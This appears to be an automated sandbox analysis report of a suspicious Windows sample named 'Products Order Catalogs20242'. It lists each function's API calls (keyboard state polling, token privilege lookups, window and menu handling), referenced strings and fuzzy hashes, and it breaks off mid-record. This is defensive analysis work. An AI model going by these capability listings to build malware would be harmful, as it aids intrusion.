                                                                                                • String ID: HH
                                                                                                • API String ID: 535477410-2761332787
                                                                                                • Opcode ID: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
                                                                                                • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                • Opcode Fuzzy Hash: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
                                                                                                • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                APIs
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                • _wcslen.LIBCMT ref: 00460502
                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                • String ID: ThumbnailClass
                                                                                                • API String ID: 4123061591-1241985126
                                                                                                • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                APIs
                                                                                                  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                • ReleaseCapture.USER32 ref: 0046F589
                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                • API String ID: 2483343779-2060113733
                                                                                                • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                                • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                                • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                APIs
                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                • String ID: 2
                                                                                                • API String ID: 1331449709-450215437
                                                                                                • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow
                                                                                                • String ID: static
                                                                                                • API String ID: 3375834691-2160076837
                                                                                                • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                                • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                • _memcmp.LIBCMT ref: 004394A9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                Strings
                                                                                                • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                • API String ID: 1446985595-805462909
                                                                                                • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DriveType
                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                • API String ID: 2907320926-41864084
                                                                                                • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                APIs
                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                • String ID:
                                                                                                • API String ID: 1932665248-0
                                                                                                • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                • _memset.LIBCMT ref: 004481BA
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                • String ID:
                                                                                                • API String ID: 830647256-0
                                                                                                • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                APIs
                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                • DeleteObject.GDI32(00410000), ref: 0046EB4F
                                                                                                • DestroyIcon.USER32(0049004D), ref: 0046EB67
                                                                                                • DeleteObject.GDI32(74D9F997), ref: 0046EB7F
                                                                                                • DestroyWindow.USER32(019A00C0), ref: 0046EB97
                                                                                                • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                • String ID:
                                                                                                • API String ID: 802431696-0
                                                                                                • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: State$Async$Keyboard
                                                                                                • String ID:
                                                                                                • API String ID: 541375521-0
                                                                                                • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                • _wcslen.LIBCMT ref: 00450944
                                                                                                • _wcscat.LIBCMT ref: 00450955
                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                • String ID: -----$SysListView32
                                                                                                • API String ID: 4008455318-3975388722
                                                                                                • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00448625
                                                                                                • CreateMenu.USER32 ref: 0044863C
                                                                                                • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                • IsMenu.USER32(?), ref: 004486EB
                                                                                                • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                • DrawMenuBar.USER32 ref: 00448742
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 176399719-4108050209
                                                                                                • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                • GetParent.USER32 ref: 004692A4
                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                • GetParent.USER32 ref: 004692C7
                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 2040099840-1403004172
                                                                                                • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
